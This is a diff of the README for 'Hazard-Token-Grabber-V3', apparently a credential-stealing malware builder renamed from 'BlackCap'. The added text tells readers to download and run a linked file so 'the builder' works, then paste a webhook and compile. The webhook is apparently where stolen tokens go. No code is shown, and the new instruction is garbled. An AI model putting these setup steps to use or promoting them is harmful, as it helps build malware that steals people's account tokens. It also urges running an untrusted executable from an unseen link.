revivesgrave/Hazard-Token-Grabber-V3/README.md

 🌐 〢 Content
-🎉・Setting up BlackCap
+🎉・Setting up Hazard
 🔰・Features
 👁️・Features Explanation
 📝・Changelog
 🕵️‍♂️・Credits
 💼・Term
-📁 〢 Setting up BlackCap
+📁 〢 Setting up Hazard
-Install Python
-Install BlackCap Files
-Install all requirements install.bat
-Click on start.bat start.bat
-Complete the configuration
-You have your .exe file enjoy :)
-🔰 〢 Features
+Go to the Download file on the github repository press the link or copy and paste into another tab and download file and run it for the builder to work after that copy your webhook and pate in the box above compile 🔰 〢 Features
 > Default: